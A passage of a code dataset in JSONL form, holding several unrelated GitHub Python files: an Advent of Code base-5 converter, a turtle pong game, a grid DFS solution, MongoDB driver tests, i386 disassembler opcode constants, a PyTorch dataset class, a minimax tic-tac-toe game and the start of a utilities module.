== \"=\":\n val = -2\n elif snafu_list[i] == \"-\":\n val = -1\n else:\n val = int(snafu_list[i])\n vals_to_sum.append(math.pow(5, i) * val)\n\n return sum(vals_to_sum)\n\n\ndef to_base_5(n):\n s = \"\"\n while n:\n s = str(n % 5) + s\n n //= 5\n return s\n\n\ndef decimal_to_SNAFU(val):\n normal_base5 = to_base_5(val)\n if not (\"3\" in normal_base5 or \"4\" in normal_base5):\n return normal_base5\n else:\n contains_bad_chars = True\n normal_base_list = [int(c) for c in list(normal_base5)]\n while contains_bad_chars:\n if len(normal_base_list) > 1:\n stop = len(normal_base_list) - 1\n else:\n stop = len(normal_base_list)\n for i in range(0, stop):\n if i == 0:\n if normal_base_list[i] > 2:\n normal_base_list.insert(0, 1)\n normal_base_list[i + 1] -= 5\n break\n if normal_base_list[i + 1] == 3:\n normal_base_list[i] += 1\n normal_base_list[i + 1] = -2\n if normal_base_list[i + 1] == 4:\n normal_base_list[i] += 1\n normal_base_list[i + 1] = -1\n contains_bad_chars = (3 in normal_base_list) or (4 in normal_base_list)\n\n final_val = \"\".join([int_to_snafu(v) for v in normal_base_list])\n print(final_val)\n return final_val\n\n # # increment biggest val\n # if normal_base5[0] == \"2\":\n # new_base_5 = \"1\" + \"0\" * len(normal_base5)\n # elif normal_base5[0] == \"1\":\n # new_base_5 = \"2\" + \"0\" * (len(normal_base5) - 1)\n # elif (normal_base5[0]) == \"0\":\n # new_base_5 = \"1\" + \"0\" * (len(normal_base5) - 1)\n\n # # take diff to required val\n # nn = to_base_5(int(SNAFU_to_decimal(new_base_5)) - int(val))\n # # if it is already now compatible base 5 we take it away char by char and return\n # if not (\"3\" in nn or \"4\" in nn):\n # snafu_list = list(reversed(list(nn)))\n # new_base_5_reversed = list(reversed(list(new_base_5)))\n # for i in range(0, len(snafu_list)):\n # new_val = int(new_base_5_reversed[i]) - int(snafu_list[i])\n # new_char = int_to_snafu(new_val)\n # new_base_5_reversed[i] = new_char\n\n # new_base_5_reversed.reverse()\n # return \"\".join(new_base_5_reversed)\n # else:\n # pass\n\n\nif __name__ == \"__main__\":\n with open(\n \"/Users/TimothyW/Fun/avent_of_code/2022/day_twenty_five/input.txt\", \"r\"\n ) as f:\n test_input = list(map(lambda x: x.strip(\"\\n\").strip(), f.readlines()))\n\n total = sum(list(map(lambda x: SNAFU_to_decimal(x), test_input)))\n\n print(total)\n\n r = decimal_to_SNAFU(int(total))\n print(r)\n","repo_name":"Williams224/advent_of_code","sub_path":"2022/day_twenty_five/day_twenty_five.py","file_name":"day_twenty_five.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38807767390","text":"#import turtle module\n\nimport turtle\n\nwind = turtle.Screen()\nwind.title(\"Ping Pong Game\")\nwind.bgcolor(\"black\")\nwind.setup(width=800, height=600)\n\nwind.tracer(0) # stop update the screen\n\n\n#player 1\nplayer1 = turtle.Turtle()\nplayer1.speed(0)\nplayer1.shape(\"square\")\nplayer1.color(\"blue\")\nplayer1.shapesize(stretch_wid=5, stretch_len=1)\nplayer1.penup()\nplayer1.goto(-350, 0)\n\n#player 2\nplayer2 = turtle.Turtle()\nplayer2.speed(0)\nplayer2.shape(\"square\")\nplayer2.color(\"red\")\nplayer2.shapesize(stretch_wid=5, stretch_len=1)\nplayer2.penup()\nplayer2.goto(350, 0)\n\n#ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"square\")\nball.color(\"white\")\nball.penup()\nball.goto(0, 0)\nball.dx = 2.5\nball.dy = 2.5\n\n#score\nscore1 = 0\nscore2 = 0\nscore = turtle.Turtle()\nscore.speed(0)\nscore.color('white')\nscore.penup()\nscore.hideturtle()\nscore.goto(0, 260)\nscore.write(\"player 1: 0, Player 2: 0\", align='center', font=('Courier', 24, 'normal'))\n\n#functions\ndef player1_move_up():\n y = player1.ycor()\n y += 20\n player1.sety(y)\n\ndef player1_move_down():\n y = player1.ycor()\n y -= 20\n player1.sety(y)\n\ndef player2_move_up():\n y = player2.ycor()\n y += 20\n player2.sety(y)\n\ndef player2_move_down():\n y = player2.ycor()\n y -= 20\n player2.sety(y)\n\n#keybord bindings\nwind.listen()\nwind.onkeypress(player1_move_up, 'w')\nwind.onkeypress(player1_move_down, 's')\nwind.onkeypress(player2_move_up, 'Up')\nwind.onkeypress(player2_move_down, 'Down')\n\nwhile True:\n wind.update()\n\n # move the ball\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n #border check\n if ball.ycor() > 290:\n ball.sety(290)\n ball.dy *= -1\n\n if ball.ycor() < -290:\n ball.sety(-290)\n ball.dy *= -1\n\n if ball.xcor() > 390:\n ball.goto(0, 0)\n ball.dx *= -1\n score1 += 1\n score.clear()\n score.write(\"player 1: {}, Player 2: {}\".format(score1, score2), align='center', font=('Courier', 24, 'normal'))\n\n if ball.xcor() < -390:\n ball.goto(0, 0)\n ball.dx *= -1\n score2 += 1\n score.clear()\n score.write(\"player 1: {}, Player 2: {}\".format(score1, score2), align='center', font=('Courier', 24, 'normal'))\n\n # if ball touches padlle\n if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < player2.ycor() + 40 and ball.ycor() > player2.ycor() - 40) :\n ball.setx(340)\n ball.dx *= -1\n\n if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < player1.ycor() + 40 and ball.ycor() > player1.ycor() - 40) :\n ball.setx(-340)\n ball.dx *= -1\n","repo_name":"mohamedahmedaa22/python-ping-pong-game","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72959683308","text":"import sys\nsys.setrecursionlimit(10**4)\n\n# 하 좌 상 우\ndx = [1, 0, -1, 0]\ndy = [0, -1, 0, 1]\n\n\ndef dfs(x, y):\n global ch_matrix, matrix\n ch_matrix[x][y] = 1\n cnt = 1\n\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < M and matrix[nx][ny] == '#' and ch_matrix[nx][ny] == 0:\n ch_matrix[nx][ny] = 1\n cnt += dfs(nx, ny)\n return cnt\n\n\nN, M, K = map(int, input().split())\ngarbage = [tuple(map(int, input().split())) for _ in range(K)]\nmatrix = []\nfor _ in range(N):\n matrix.append(['.' for _ in range(M)])\nfor x, y in garbage:\n matrix[x-1][y-1] = '#'\nlargest = 0\nch_matrix = []\nfor _ in range(N):\n ch_matrix.append([0 for _ in range(M)])\n\nfor x in range(N):\n for y in range(M):\n if matrix[x][y] == '#' and ch_matrix[x][y] == 0:\n ch_matrix[x][y] = 1\n largest = max(largest, dfs(x, y))\n\nprint(largest)","repo_name":"bansakdo/Algorithm","sub_path":"BOJ/DFS/Q1743.py","file_name":"Q1743.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39426851998","text":"# coding: utf-8\nfrom __future__ import with_statement\nfrom tornado.ioloop import IOLoop\nfrom tornado import testing\nfrom mongotor.connection import Connection\nfrom mongotor.errors import InterfaceError, DatabaseError, IntegrityError\nfrom bson import ObjectId\nfrom mongotor import message\nfrom mongotor import helpers\n\nimport sure\nimport fudge\n\n\nclass ConnectionTestCase(testing.AsyncTestCase):\n\n def get_new_ioloop(self):\n return IOLoop.instance()\n\n def setUp(self):\n super(ConnectionTestCase, self).setUp()\n self.conn = Connection(host=\"localhost\", port=27027)\n\n def tearDown(self):\n super(ConnectionTestCase, self).tearDown()\n self.conn.close()\n\n def test_not_connect_to_mongo_raises_error(self):\n \"\"\"[ConnectionTestCase] - Raises error when can't connect to mongo\"\"\"\n\n Connection.when.called_with(host=\"localhost\", port=27000) \\\n .should.throw(InterfaceError, \"Connection refused\")\n\n def test_connect_to_mongo(self):\n \"\"\"[ConnectionTestCase] - Can stabilish connection to mongo\"\"\"\n\n self.conn._connected.should.be.ok\n\n def test_send_test_message_to_mongo(self):\n \"\"\"[ConnectionTestCase] - Send message to test driver connection\"\"\"\n\n object_id = ObjectId()\n message_test = message.query(0, 'mongotor_test.$cmd', 0, 1,\n {'driverOIDTest': object_id})\n\n self.conn.send_message_with_response(message_test, callback=self.stop)\n response, _ = self.wait()\n\n response = helpers._unpack_response(response)\n result = response['data'][0]\n\n result['oid'].should.be(object_id)\n result['ok'].should.be(1.0)\n result['str'].should.be(str(object_id))\n\n def test_close_connection_to_mongo(self):\n \"\"\"[ConnectionTestCase] - Can close connection to mongo\"\"\"\n\n self.conn.close()\n\n self.conn._connected.should_not.be.ok\n self.conn._stream.closed().should.be.ok\n\n def test_return_integrity_error_when_mongo_return_err(self):\n \"\"\"[ConnectionTestCase] - Returns IntegrityError when mongo return a message with err\"\"\"\n\n object_id = ObjectId()\n message_insert = message.insert('mongotor_test.articles', [{'_id': object_id}],\n False, True, {})\n\n self.conn.send_message(message_insert, True, callback=self.stop)\n self.wait()\n\n self.conn.send_message(message_insert, True, callback=self.stop)\n self.wait.when.called_with().throw(IntegrityError)\n\n @fudge.patch('mongotor.connection.helpers')\n def test_raises_error_when_cant_unpack_response(self, fake_helpers):\n \"\"\"[ConnectionTestCase] - Returns DatabaseError when can't unpack response from mongo\"\"\"\n\n fake_helpers.provides('_unpack_response') \\\n .raises(DatabaseError('database error'))\n\n object_id = ObjectId()\n message_test = message.query(0, 'mongotor_test.$cmd', 0, 1,\n {'driverOIDTest': object_id})\n\n self.conn.send_message(message_test, with_last_error=True, callback=self.stop)\n\n self.wait.when.called_with().throw(DatabaseError, 'database error')\n\n def test_reconnect_when_connection_was_lost(self):\n \"\"\"[ConnectionTestCase] - Reconnect to mongo when connection was lost\"\"\"\n\n self.conn.close()\n self.conn._callback = self.stop\n self.wait()\n\n self.test_send_test_message_to_mongo()\n\n def test_raises_interface_error_when_cant_reconnect(self):\n \"\"\"[ConnectionTestCase] - Raises InterfaceError when connection was lost and autoreconnect is False\"\"\"\n\n self.conn = Connection(host=\"localhost\", port=27027, autoreconnect=False)\n\n self.conn.close()\n\n self.conn.send_message.when.called_with('shouldBeMessage',\n callback=None).should.throw(InterfaceError, \"connection is closed\")\n\n def test_raises_error_when_stream_reaise_ioerror(self):\n \"\"\"[ConnectionTestCase] - Raises IOError when stream throw error\"\"\"\n fake_stream = fudge.Fake()\n fake_stream.expects('write').raises(IOError())\n\n with fudge.patched_context(self.conn, '_stream', fake_stream):\n\n self.conn.send_message.when.called_with((0, ''), callback=None) \\\n .throw(IOError)\n","repo_name":"marcelnicolay/mongotor","sub_path":"tests/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"37"} +{"seq_id":"3266930564","text":"\n# The opcode tables were taken from Mammon_'s Guide to Writing Disassemblers in Perl, You Morons!\"\n# and the bastard project. http://www.eccentrix.com/members/mammon/\n\nINSTR_PREFIX = 0xF0000000\nADDRMETH_MASK = 0x00FF0000\nADDRMETH_A = 0x00010000 # Direct address with segment prefix\nADDRMETH_B = 0x00020000 # VEX.vvvv field selects general purpose register\nADDRMETH_C = 0x00030000 # MODRM reg field defines control register\nADDRMETH_D = 0x00040000 # MODRM reg field defines debug register\nADDRMETH_E = 0x00050000 # MODRM byte defines reg/memory address\nADDRMETH_F = 0x00060000 # EFLAGS/RFLAGS register\nADDRMETH_G = 0x00070000 # MODRM byte defines general-purpose reg\nADDRMETH_H = 0x00080000 # VEX.vvvv field selects 128bit XMM or 256bit YMM register\nADDRMETH_I = 0x00090000 # Immediate data follows\nADDRMETH_J = 0x000A0000 # Immediate value is relative to EIP\nADDRMETH_L = 0x000B0000\nADDRMETH_M = 0x000C0000 # MODRM mod field can refer only to memory\nADDRMETH_N = 0x000D0000 # R/M field of MODRM selects a packed-quadword, MMX register\nADDRMETH_O = 0x000E0000 # Displacement follows (without modrm/sib)\nADDRMETH_P = 0x000F0000 # MODRM reg field defines MMX register\nADDRMETH_Q = 0x00100000 # MODRM defines MMX register or memory\nADDRMETH_R = 0x00110000 # MODRM mod field can only refer to register\nADDRMETH_S = 0x00120000 # MODRM reg field defines segment register\nADDRMETH_U = 0x00130000 # MODRM reg field defines test register\nADDRMETH_V = 0x00140000 # MODRM reg field defines XMM register\nADDRMETH_W = 0x00150000 # MODRM defines XMM register or memory\nADDRMETH_X = 0x00160000 # Memory addressed by DS:rSI\nADDRMETH_Y = 0x00170000 # Memory addressd by ES:rDI\nADDRMETH_LAST = ADDRMETH_Y\n\nOPTYPE_a = 0x01000000 # 2/4 two one-word operands in memory or two double-word operands in memory (operand-size attribute) \nOPTYPE_b = 0x02000000 # 1 always 1 byte\nOPTYPE_c = 0x03000000 # 1/2 byte or word, depending on operand\nOPTYPE_d = 0x04000000 # 4 double-word\nOPTYPE_ds = 0x04000000 # 4 double-word\nOPTYPE_dq = 0x05000000 # 16 double quad-word\nOPTYPE_p = 0x06000000 # 4/6 32-bit or 48-bit pointer\nOPTYPE_pi = 0x07000000 # 8 quadword MMX register\nOPTYPE_ps = 0x08000000 # 16 128-bit single-precision float\nOPTYPE_pd = 0x08000000 # ?? should be a double-precision float?\nOPTYPE_q = 0x09000000 # 8 quad-word\nOPTYPE_qp = 0x09000000 # 8 quad-word\nOPTYPE_qq = 0x0A000000 # 8 quad-word\nOPTYPE_s = 0x0B000000 # 6 6-byte pseudo descriptor\nOPTYPE_ss = 0x0C000000 # ?? Scalar of 128-bit single-precision float\nOPTYPE_si = 0x0D000000 # 4 Doubleword integer register\nOPTYPE_sd = 0x0E000000 # ??? \nOPTYPE_v = 0x0F000000 # 2/4 word or double-word, depending on operand\nOPTYPE_w = 0x10000000 # 2 always word\nOPTYPE_x = 0x11000000 # 2 always word\nOPTYPE_y = 0x12000000 # 4/8 dword or qword\nOPTYPE_z = 0x13000000 # 2/4 is this OPTYPE_z? word for 16-bit operand size or doubleword for 32 or 64-bit operand-size\n\nOPTYPE_fs = 0x14000000 # \nOPTYPE_fd = 0x15000000 # \nOPTYPE_fe = 0x16000000 # \nOPTYPE_fb = 0x17000000 # \nOPTYPE_fv = 0x18000000 # \n\n# FIXME this should probably be a list rather than a dictionary\n\nOPERSIZE = {\n 0 : (2,4,8), # We will only end up here on regs embedded in opcodes\n OPTYPE_a : (2,4,4),\n OPTYPE_b : (1,1,1),\n OPTYPE_c : (1,2,2), # 1/2 byte or word, depending on operand\n OPTYPE_d : (4,4,4), # 4 double-word\n OPTYPE_dq: (16,16,16), # 16 double quad-word\n OPTYPE_p : (4,6,6), # 4/6 32-bit or 48-bit pointer\n OPTYPE_pi: (8,8,8), # 8 quadword MMX register\n OPTYPE_ps: (16,16,16), # 16 128-bit single-precision float\n OPTYPE_pd: (16,16,16), # ?? should be a double-precision float?\n OPTYPE_q : (8,8,8), # 8 quad-word\n OPTYPE_qq: (32,32,32), # 32 quad-quad-word\n OPTYPE_s : (6,10,10), # 6 6-byte pseudo descriptor\n OPTYPE_ss: (16,16,16), # ?? Scalar of 128-bit single-precision float\n OPTYPE_si: (4,4,4), # 4 Doubleword integer register\n OPTYPE_sd: (16,16,16), # ??? Scalar of 128-bit double-precision float\n OPTYPE_v : (2,4,8), # 2/4 word or double-word, depending on operand\n OPTYPE_w : (2,2,2), # 2 always word\n OPTYPE_x : (16,16,32), # 16/32 double-quadword or quad-quadword\n OPTYPE_y : (4,4,8), # 4/8 dword or qword in 64-bit mode\n OPTYPE_z : (2,4,4), # word for 16-bit operand size or doubleword for 32 or 64-bit operand-size\n # Floating point crazyness FIXME these are mostly wrong\n OPTYPE_fs: (4,4,4),\n OPTYPE_fd: (8,8,8),\n OPTYPE_fe: (10,10,10),\n OPTYPE_fb: (10,10,10),\n OPTYPE_fv: (14,14,28),\n}\n\n\nINS_EXEC = 0x1000\nINS_ARITH= 0x2000\nINS_LOGIC= 0x3000\nINS_STACK= 0x4000\nINS_COND = 0x5000\nINS_LOAD = 0x6000\nINS_ARRAY= 0x7000\nINS_BIT = 0x8000\nINS_FLAG = 0x9000\nINS_FPU = 0xA000\nINS_TRAPS= 0xD000\nINS_SYSTEM = 0xE000\nINS_OTHER= 0xF000\n\nINS_BRANCH = INS_EXEC | 0x01 \nINS_BRANCHCC= INS_EXEC | 0x02 \nINS_CALL = INS_EXEC | 0x03\nINS_CALLCC = INS_EXEC | 0x04 \nINS_RET = INS_EXEC | 0x05 \nINS_LOOP = INS_EXEC | 0x06 \n \nINS_ADD= INS_ARITH | 0x01\nINS_SUB= INS_ARITH | 0x02\nINS_MUL= INS_ARITH | 0x03\nINS_DIV= INS_ARITH | 0x04\nINS_INC= INS_ARITH | 0x05 \nINS_DEC= INS_ARITH | 0x06 \nINS_SHL= INS_ARITH | 0x07 \nINS_SHR= INS_ARITH | 0x08\nINS_ROL= INS_ARITH | 0x09\nINS_ROR= INS_ARITH | 0x0A\n\nINS_AND= INS_LOGIC | 0x01\nINS_OR = INS_LOGIC | 0x02\nINS_XOR= INS_LOGIC | 0x03\nINS_NOT= INS_LOGIC | 0x04\nINS_NEG= INS_LOGIC | 0x05\n \nINS_PUSH= INS_STACK | 0x01\nINS_POP = INS_STACK | 0x02\nINS_PUSHREGS= INS_STACK | 0x03 \nINS_POPREGS= INS_STACK | 0x04 \nINS_PUSHFLAGS= INS_STACK | 0x05 \nINS_POPFLAGS= INS_STACK | 0x06 \nINS_ENTER= INS_STACK | 0x07\nINS_LEAVE = INS_STACK | 0x08\n\nINS_TEST = INS_COND | 0x01\nINS_CMP = INS_COND | 0x02\n \nINS_MOV = INS_LOAD | 0x01\nINS_MOVCC = INS_LOAD | 0x02\nINS_XCHG = INS_LOAD | 0x03\nINS_XCHGCC = INS_LOAD | 0x04\nINS_LEA = INS_LOAD | 0x05\n \nINS_STRCMP = INS_ARRAY | 0x01\nINS_STRLOAD = INS_ARRAY | 0x02\nINS_STRMOV = INS_ARRAY | 0x03\nINS_STRSTOR = INS_ARRAY | 0x04\nINS_XLAT = INS_ARRAY | 0x05\n \nINS_BITTEST = INS_BIT | 0x01\nINS_BITSET = INS_BIT | 0x02\nINS_BITCLR = INS_BIT | 0x03\n\nINS_CLEARCF = INS_FLAG | 0x01\nINS_CLEARZF = INS_FLAG | 0x02 \nINS_CLEAROF = INS_FLAG | 0x03\nINS_CLEARDF = INS_FLAG | 0x04\nINS_CLEARSF = INS_FLAG | 0x05 \nINS_CLEARPF = INS_FLAG | 0x06 \nINS_SETCF = INS_FLAG | 0x07\nINS_SETZF = INS_FLAG | 0x08\nINS_SETOF = INS_FLAG | 0x09\nINS_SETDF = INS_FLAG | 0x0A\nINS_SETSF = INS_FLAG | 0x0B\nINS_SETPF = INS_FLAG | 0x0C\nINS_TOGCF = INS_FLAG | 0x10 #/* toggle */\nINS_TOGZF = INS_FLAG | 0x20\nINS_TOGOF = INS_FLAG | 0x30\nINS_TOGDF = INS_FLAG | 0x40\nINS_TOGSF = INS_FLAG | 0x50\nINS_TOGPF = INS_FLAG | 0x60\n\nINS_TRAP = INS_TRAPS | 0x01 #/* generate trap */\nINS_TRAPCC= INS_TRAPS | 0x02 #/* conditional trap gen */\nINS_TRET = INS_TRAPS | 0x03 #/* return from trap */\nINS_BOUNDS= INS_TRAPS | 0x04 #/* gen bounds trap */\nINS_DEBUG = INS_TRAPS | 0x05 #/* gen breakpoint trap */\nINS_TRACE = INS_TRAPS | 0x06 #/* gen single step trap */\nINS_INVALIDOP= INS_TRAPS | 0x07 #/* gen invalid instruction */\nINS_OFLOW = INS_TRAPS | 0x08 #/* gen overflow trap */\n \n#/* INS_SYSTEM */\nINS_HALT = INS_SYSTEM | 0x01 # /* halt machine */\nINS_IN = INS_SYSTEM | 0x02 # /* input form port */\nINS_OUT = INS_SYSTEM | 0x03 # /* output to port */\nINS_CPUID = INS_SYSTEM | 0x04 # /* iden\n\nINS_NOP = INS_OTHER | 0x01\nINS_BCDCONV = INS_OTHER | 0x02 #/* convert to/from BCD */\nINS_SZCONV = INS_OTHER | 0x03 #/* convert size of operand */\n\n\nOP_R= 0x001 \nOP_W= 0x002 \nOP_X= 0x004 \nOP_64AUTO= 0x008 # operand is in 64bit mode with amd64!\n\nOP_UNK= 0x000 \nOP_REG= 0x100 \nOP_IMM= 0x200 \nOP_REL= 0x300 \nOP_ADDR= 0x400 \nOP_EXPR= 0x500 \nOP_PTR = 0x600 \nOP_OFF = 0x700 \n\nOP_SIGNED= 0x001000 \nOP_STRING= 0x002000 \nOP_CONST = 0x004000\n\nARG_NONE = 0\ncpu_8086 = 0x00001000\ncpu_80286= 0x00002000\ncpu_80386= 0x00003000\ncpu_80387= 0x00004000\ncpu_80486= 0x00005000\ncpu_PENTIUM= 0x00006000\ncpu_PENTPRO= 0x00007000\ncpu_PENTMMX= 0x00008000\ncpu_PENTIUM2= 0x00009000\ncpu_AMD64= 0x0000a000\n\n#import envi.archs.i386.regs as e_i386_regs\n# Relative import priority...\n\n#eventually, change this for your own codes\n#ADDEXP_SCALE_OFFSET= 0 \n#ADDEXP_INDEX_OFFSET= 8\n#ADDEXP_BASE_OFFSET = 16\n#ADDEXP_DISP_OFFSET = 24\n#MODRM_EA = 1\n#MODRM_reg= 0\nADDRMETH_MASK = 0x00FF0000\nOPTYPE_MASK = 0xFF000000\nOPFLAGS_MASK = 0x0000FFFF\n\n","repo_name":"bat-serjo/vivisect-py3","sub_path":"varchs/i386/opconst.py","file_name":"opconst.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"2081762295","text":"import os\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport glob\n\nclass CustomDataset(Dataset) :\n def __init__(self, data_dir, transform=None):\n self.data_dir = glob.glob(os.path.join(data_dir,\"*\", \"*\", \"*.jpg\"))\n\n self.transform = transform\n self.label_dict = self.create_label_dict(data_dir)\n\n def create_label_dict(self, data_dir):\n\n label_dict = {}\n for root, dirs, files in os.walk(data_dir):\n if len(dirs) == 0:\n label_name = os.path.basename(root)\n label_dict[label_name] = len(label_dict)\n\n return label_dict\n\n\n\n def __getitem__(self, item):\n image_path = self.data_dir[item]\n image = Image.open(image_path)\n image = image.convert(\"RGB\")\n label_name = os.path.basename(os.path.dirname(image_path))\n label = self.label_dict[label_name]\n\n if self.transform is not None :\n image = self.transform(image)\n\n return image ,label\n\n def __len__(self):\n return len(self.data_dir)\n","repo_name":"1107c/recommend","sub_path":"train/customdataset.py","file_name":"customdataset.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5328872052","text":"import pygame\nimport math\nfrom math import inf\n\npygame.init()\n\n# Screen\nWIDTH = 500\nROWS = 3\nwin = pygame.display.set_mode((WIDTH, WIDTH))\npygame.display.set_caption(\"TicTacToe\")\n\n\n# Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGRAY = (200, 200, 200)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\n# Images\nX_pic = pygame.transform.scale(\n pygame.image.load(\"Images/x.png\"), (150, 150))\nO_pic = pygame.transform.scale(\n pygame.image.load(\"Images/o.png\"), (150, 150))\n\n# Fonts\nEND_FONT = pygame.font.SysFont('Arial', 40)\n\n\ndef draw_grid():\n gap = WIDTH // ROWS\n\n # Starting points\n x = 0\n y = 0\n\n for i in range(ROWS):\n x = i * gap\n\n pygame.draw.line(win, GRAY, (x, 0), (x, WIDTH), 3)\n pygame.draw.line(win, GRAY, (0, x), (WIDTH, x), 3)\n\n\ndef grid_init():\n dis_to_cen = WIDTH // ROWS // 2\n\n # Initializing board array\n brd = [[None, None, None], [None, None, None], [None, None, None]]\n\n for i in range(len(brd)):\n for j in range(len(brd[i])):\n x = dis_to_cen * (2 * j + 1)\n y = dis_to_cen * (2 * i + 1)\n\n # Adding centre\n brd[i][j] = (x, y, '', True)\n\n return brd\n\n\ndef emptyCells(brd):\n empty = []\n for i in range(3):\n for j in range(3):\n if brd[i][j][3] == True:\n empty.append([i, j])\n return empty\n\n\ndef click(brd, turn):\n\n # Mouse position\n m_x, m_y = pygame.mouse.get_pos()\n\n for i in range(len(brd)):\n for j in range(len(brd[i])):\n x, y, char, can_play = brd[i][j]\n # Distance between mouse and the centre of the square\n dis = math.sqrt((x - m_x) ** 2 + (y - m_y) ** 2)\n print([x, y, m_x, m_y, dis])\n\n # If it's X's turn\n if turn == 1:\n\n # If it's inside the square\n if dis < WIDTH // ROWS // 2 and can_play:\n images.append((x, y, X_pic))\n brd[i][j] = (x, y, 1, False)\n return\n\n # If it's O's turn\n elif turn == -1:\n if len(emptyCells(brd)) % 2 == 1 and choice == 1:\n return\n if len(emptyCells(brd)) % 2 == 0 and choice == 2:\n return\n result = Position(\n AlphaBetaMM(brd, len(emptyCells(brd)), -inf, inf, -1))\n images.append((result[0], result[1], O_pic))\n if result[2] == i and result[3] == j and can_play:\n brd[result[2]][result[3]] = (\n result[0], result[1], -1, False)\n return\n\n\n# Check if someone has won\ndef who_won(brd):\n\n win_states = [[brd[0][0][2], brd[0][1][2], brd[0][2][2]],\n [brd[1][0][2], brd[1][1][2], brd[1][2][2]],\n [brd[2][0][2], brd[2][1][2], brd[2][2][2]],\n [brd[0][0][2], brd[1][0][2], brd[2][0][2]],\n [brd[0][1][2], brd[1][1][2], brd[2][1][2]],\n [brd[0][2][2], brd[1][2][2], brd[2][2][2]],\n [brd[0][0][2], brd[1][1][2], brd[2][2][2]],\n [brd[0][2][2], brd[1][1][2], brd[2][0][2]]]\n\n if [1, 1, 1] in win_states:\n #display_message(\"X has won!\")\n return 1\n\n elif [-1, -1, -1] in win_states:\n #display_message(\"O has won!\")\n return -1\n\n return False\n\n\ndef has_drawn(brd):\n for i in range(3):\n for j in range(3):\n if brd[i][j][2] == '':\n return False\n\n display_message(\"Draw\")\n return True\n\n\ndef display_message(content):\n pygame.time.delay(500)\n win.fill(WHITE)\n if content[0] == 'X':\n end_text = END_FONT.render(content, 1, RED)\n elif content[0] == 'O':\n end_text = END_FONT.render(content, 1, BLUE)\n elif content[0] == 'D':\n end_text = END_FONT.render(content, 1, BLACK)\n win.blit(end_text, ((WIDTH - end_text.get_width()) //\n 2, (WIDTH - end_text.get_height()) // 2))\n pygame.display.update()\n pygame.time.delay(2000)\n\n\ndef render():\n win.fill(WHITE)\n draw_grid()\n\n # Drawing X's and O's\n for image in images:\n x, y, IMAGE = image\n win.blit(IMAGE, (x - IMAGE.get_width() //\n 2, y - IMAGE.get_height() // 2))\n\n pygame.display.update()\n\n\ndef getScore(brd):\n if who_won(brd) == 1:\n return 10\n\n elif who_won(brd) == -1:\n return -10\n\n else:\n return 0\n\n\ndef AlphaBetaMM(brd, depth, alpha, beta, player):\n row = -1\n col = -1\n if depth == 0 or who_won(brd) == 1 or who_won(brd) == -1:\n return [row, col, getScore(brd)]\n else:\n for cell in emptyCells(brd):\n brd[cell[0]][cell[1]] = (\n PosXY(cell[1]), PosXY(cell[0]), player, False)\n score = AlphaBetaMM(brd, depth - 1, alpha, beta, -player)\n if player == 1:\n # X is the max player\n if score[2] > alpha:\n alpha = score[2]\n row = cell[0]\n col = cell[1]\n\n else:\n if score[2] < beta:\n beta = score[2]\n row = cell[0]\n col = cell[1]\n\n brd[cell[0]][cell[1]] = (\n PosXY(cell[1]), PosXY(cell[0]), '', True)\n\n if alpha >= beta:\n break\n\n if player == 1:\n return [row, col, alpha]\n\n else:\n return [row, col, beta]\n\n\ndef Position(pos):\n dis_to_cen = WIDTH // ROWS // 2\n y = dis_to_cen * (2 * pos[0] + 1)\n x = dis_to_cen * (2 * pos[1] + 1)\n return [x, y, pos[0], pos[1]]\n\n\ndef PosXY(pos):\n dis_to_cen = WIDTH // ROWS // 2\n x = dis_to_cen * (2 * pos + 1)\n return x\n\n\ndef main():\n global images, draw, choice\n images = []\n draw = False\n\n run = True\n\n choice = int(input(\"You want to go first or second?(1/2)\"))\n\n brd = grid_init()\n if(choice == 1):\n print('')\n else:\n click(brd, -1)\n while run:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n click(brd, 1)\n click(brd, -1)\n print(emptyCells(brd))\n print(brd)\n\n render()\n\n if who_won(brd) == 1 or who_won(brd) == -1 or has_drawn(brd):\n if who_won(brd) == 1:\n display_message(\"X has won!\")\n elif who_won(brd) == -1:\n display_message(\"O has won!\")\n run = False\n\n\nwhile True:\n if __name__ == '__main__':\n main()\n","repo_name":"f1379d/AI-Alghoritmes","sub_path":"TicTacToe/TicTacToeGame.py","file_name":"TicTacToeGame.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27330000010","text":"# pyGestalt Utilities Module\n\n\"\"\"Provides a host of common utility functions used across the pyGestalt framework.\"\"\"\n\n\n#---- IMPORTS ----\nimport math\nimport ast\nimport datetime\nimport itertools\nimport sys\nfrom pygestalt import config\n\n\ndef callFunctionAcrossMRO(instance, functionName, args = (), kwargs = {}, parentToChild = True):\n \"\"\"Calls a function on all classes in instance's method resolution order.\n \n instance -- the instance to be provided to the class methods, and also used to pull the method resolution order list.\n functionName -- the name of the function to be called\n args -- positional arguments to be passed to the function\n kwargs -- keyward arguments to be passed to the function\n parentToChild -- affects the order in which base classes are called. If true, will walk up derived classes from basest base class.\n \n This function is particularly useful in initialiation routines where the same function must be called across multiple derived classes.\n \n Note that this only currently works with functions that do not return anything.\n \"\"\"\n \n mro = 